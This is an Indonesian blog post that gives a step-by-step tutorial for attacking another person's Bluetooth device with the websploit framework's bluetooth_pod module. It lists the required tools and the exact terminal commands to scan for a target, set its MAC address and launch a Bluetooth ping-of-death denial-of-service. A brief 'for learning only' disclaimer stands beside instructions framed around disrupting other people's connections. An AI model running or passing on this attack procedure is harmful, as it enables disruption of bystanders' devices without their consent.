Sunday 17 June 2018

rusak sinyal bluetooth dengan websploit

Assalamualaikum Wr WB

OKe para agan sekalian kembali saya disini akan membahas khusunya di bidang IT Security, karena SAINS dan IT terdepan saya juga harus bahas tentang IT

Saya disini akan memberitahu bagaimana caranya mengganggu jaringan bluetooth seseorang dengan websploit, namu perlu di ingat! ini hanya untuk pembelajaran semata! tidak untuk di salah gunakan.oke langsung saja

Alat dan Bahan
1. pastinya PC/Lapton
2. Bluetooth interface
3. Os Linux,disini saya gunakan kali linux 2.0

pertama-tama buka terminal dan ketikan

"root@localhost:~#sudo websploit "

2. ketikan di terminal

 " show modules "

3. copykan text ini di terminal

"use bluetooth/bluetooth_pod"

4. ketikan di terminal

"show options"

5. scan target bluetooth anda dgn mengetik di terminal

"scan"

6. set bdaddr anda dengan mengetikan di terminal

" set bdaddr (mac address target anda) " lalu enter

7. lalu ketikan run di terminal

" run " enter

 taaraa :v target anda berhasil di attack dengan metode bluetooth ping of death attack..

sekian tutor tentang mengganggu jaringan bluetooth orang, semoga bermanfaat. dan jangan di salah gunakan!ingat dosa tanggung sendiri jangan bawa bawa gue

Wassalamualikum Wr Wb


EmoticonEmoticon

Note: only a member of this blog may post a comment.